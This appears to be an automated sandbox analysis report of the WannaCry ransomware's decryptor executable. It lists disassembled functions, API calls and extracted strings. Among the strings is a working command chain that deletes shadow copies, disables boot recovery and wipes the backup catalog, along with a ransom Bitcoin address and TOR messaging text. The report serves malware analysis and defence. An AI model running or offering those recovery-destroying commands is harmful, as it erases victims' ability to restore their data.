    • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
    • s.wnry, xrefs: 004084DD
    • Your message has been sent successfully!, xrefs: 0040851D
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004064D0, Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 256
    APIs
    • #4710.MFC42 ref: 004064DC
    • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
    • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
      • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
      • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
      • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
      • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
      • Part of subcall function 00401C70: RegQueryValueExA.ADVAPI32 ref: 00401D81
      • Part of subcall function 00401C70: SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
      • Part of subcall function 00401C70: RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
    • strrchr.MSVCRT ref: 00406554
    • strrchr.MSVCRT ref: 00406564
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    • time.MSVCRT ref: 004065D1
      • Part of subcall function 00402C40: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    • WSAStartup.WS2_32(00000202,?), ref: 004065FA
    • __p___argc.MSVCRT ref: 00406600
    • __p___argv.MSVCRT ref: 0040661A
    • ExitProcess.KERNEL32 ref: 0040665B
    • __p___argv.MSVCRT ref: 00406666
    • ExitProcess.KERNEL32 ref: 004066A7
    • __p___argv.MSVCRT ref: 004066B2
    • Sleep.KERNEL32(00002710), ref: 004066F3
      • Part of subcall function 00401BB0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
      • Part of subcall function 00401BB0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
      • Part of subcall function 00401BB0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
    • ExitProcess.KERNEL32 ref: 00406786
      • Part of subcall function 00401B50: ShellExecuteExA.SHELL32 ref: 00401B9D
    • sprintf.MSVCRT ref: 0040676A
      • Part of subcall function 00401A90: CreateProcessA.KERNEL32 ref: 00401AE3
      • Part of subcall function 00401A90: WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
      • Part of subcall function 00401A90: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
      • Part of subcall function 00401A90: GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B31
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B38
      • Part of subcall function 004080C0: FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
      • Part of subcall function 004080C0: sscanf.MSVCRT ref: 0040816A
      • Part of subcall function 004080C0: fopen.MSVCRT ref: 00408185
      • Part of subcall function 004080C0: fread.MSVCRT ref: 004081A0
      • Part of subcall function 004080C0: fclose.MSVCRT ref: 004081BE
      • Part of subcall function 004080C0: FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
      • Part of subcall function 004080C0: FindClose.KERNEL32(?), ref: 00408200
      • Part of subcall function 004080C0: sprintf.MSVCRT ref: 00408266
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
      • Part of subcall function 00407F80: fopen.MSVCRT ref: 00407FBD
      • Part of subcall function 00407F80: fread.MSVCRT ref: 00407FDD
      • Part of subcall function 00407F80: fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 00407E80: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
      • Part of subcall function 00407E80: wcslen.MSVCRT ref: 00407EF4
      • Part of subcall function 00407E80: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
      • Part of subcall function 00407E80: MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
      • Part of subcall function 00407E80: CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
      • Part of subcall function 00407E80: SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FBC
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00121284), ref: 00406FC6
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FCF
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FE2
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FF5
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00000000), ref: 00406FFC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407005
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(003834D1), ref: 0040700F
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407018
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00107C10), ref: 00407022
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 0040702B
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E8A200), ref: 00407035
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 0040703E
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00D77800), ref: 00407048
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407051
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407064
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 0040709C
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
      • Part of subcall function 00406C20: GetUserDefaultLangID.KERNEL32 ref: 00406C3B
      • Part of subcall function 00406C20: GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
      • Part of subcall function 00406C20: SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
    • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
    Strings
    • Wana Decrypt0r 2.0, xrefs: 00406796
    • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
    • %s %s, xrefs: 00406764
    • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
    • cmd.exe, xrefs: 0040671C
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040B840, Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 138
    APIs
    • sprintf.MSVCRT ref: 0040B87A
    • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
    • sprintf.MSVCRT ref: 0040B924
    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
    • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
      • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000428), ref: 0040B793
      • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
      • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
      • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
      • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
    • CreateProcessA.KERNEL32(00000000,?), ref: 0040B9AA
    • WaitForSingleObject.KERNEL32(?,00001388), ref: 0040B9CF
    • WaitForSingleObject.KERNEL32(?,00007530), ref: 0040B9E2
    • CloseHandle.KERNEL32(?), ref: 0040B9EF
    • CloseHandle.KERNEL32(?), ref: 0040B9F6
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00405A60, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
    APIs
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
    • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
    • #2621.MFC42 ref: 00405A96
    • #6438.MFC42 ref: 00405A9B
      • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
      • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
    • #2514.MFC42 ref: 00405AC1
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
      • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
    • #800.MFC42 ref: 00405C33
    • #800.MFC42 ref: 00405C47
    • #800.MFC42 ref: 00405C5B
    • #800.MFC42 ref: 00405C6F
    • #781.MFC42 ref: 00405C83
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42 ref: 00405D37
    • #609.MFC42 ref: 00405D4B
    • #616.MFC42 ref: 00405D5C
    • #641.MFC42 ref: 00405D70
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00407A90, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90
    APIs
      • Part of subcall function 00404C40: #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
      • Part of subcall function 00404C40: #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
      • Part of subcall function 00404C40: #860.MFC42(00421798), ref: 00404CAD
    • #2514.MFC42 ref: 00407AF1
    • #537.MFC42(***), ref: 00407B04
    • #941.MFC42(00421234,***), ref: 00407B1A
    • #939.MFC42(?,00421234,***), ref: 00407B28
    • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
    • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
    • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
      • Part of subcall function 004082C0: #4278.MFC42(000003E8,00000000,000003E8,?,?,76923ABC), ref: 0040830D
      • Part of subcall function 004082C0: #858.MFC42 ref: 00408322
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408332
      • Part of subcall function 004082C0: #1200.MFC42(Too short message!,00000000,00000000,?,?,76923ABC), ref: 00408354
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040836B
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040837F
      • Part of subcall function 004082C0: #540.MFC42 ref: 004083C8
      • Part of subcall function 004082C0: time.MSVCRT ref: 004083D6
      • Part of subcall function 004082C0: #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
      • Part of subcall function 004082C0: #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
      • Part of subcall function 004082C0: #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
      • Part of subcall function 004082C0: #800.MFC42 ref: 00408440
      • Part of subcall function 004082C0: time.MSVCRT ref: 0040844E
      • Part of subcall function 004082C0: fopen.MSVCRT ref: 00408487
      • Part of subcall function 004082C0: #800.MFC42 ref: 004084A8
      • Part of subcall function 004082C0: fread.MSVCRT ref: 004084C2
      • Part of subcall function 004082C0: fclose.MSVCRT ref: 004084C9
      • Part of subcall function 004082C0: #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
      • Part of subcall function 004082C0: time.MSVCRT ref: 00408528
      • Part of subcall function 004082C0: #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
      • Part of subcall function 004082C0: #800.MFC42 ref: 0040855B
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
    • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
    • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
    • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
    • #2385.MFC42(?,?,?), ref: 00407C0E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004063A0, Relevance: 22.6, APIs: 15, Instructions: 82
    APIs
    • #2302.MFC42(?,0000040F,?), ref: 004063B2
    • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
    • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
    • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
    • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
    • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
    • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
    • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
    • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
    • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
    • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
    • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
    • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
    • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
    • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00412360, Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366
    APIs
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116C8
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116E7
      • Part of subcall function 00411660: free.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 00411707
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
      • Part of subcall function 00411CF0: #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00411CF0: #825.MFC42(00000000), ref: 00411E84
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F04
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F1B
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F32
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411CF0: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
      • Part of subcall function 00411CF0: #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
    • wsprintfA.USER32 ref: 004125F9
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 0041262A
    • wsprintfA.USER32 ref: 00412684
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(00000000), ref: 00412338
      • Part of subcall function 00412250: CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
    • #823.MFC42(00004000), ref: 004126BF
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00412714
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041275F
    • CloseHandle.KERNEL32(00000000), ref: 00412770
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040B620, Relevance: 13.5, APIs: 9, Instructions: 45
    APIs
    • FindWindowW.USER32(00000000,00000000), ref: 0040B628
    • ShowWindow.USER32(00000000,00000005), ref: 0040B638
    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
    • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
    • SetForegroundWindow.USER32(00000000), ref: 0040B663
    • SetFocus.USER32(00000000), ref: 0040B66A
    • SetActiveWindow.USER32(00000000), ref: 0040B671
    • BringWindowToTop.USER32(00000000), ref: 0040B678
    • ExitProcess.KERNEL32 ref: 0040B689
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00401A10, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42
    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 00412250, Relevance: 6.1, APIs: 4, Instructions: 100
    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
    • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 0040DAD0, Relevance: 6.0, APIs: 4, Instructions: 45
    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    Function 004043E0, Relevance: 4.5, APIs: 3, Instructions: 15
    APIs
    • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
    • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
    • #5277.MFC42 ref: 00404402
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
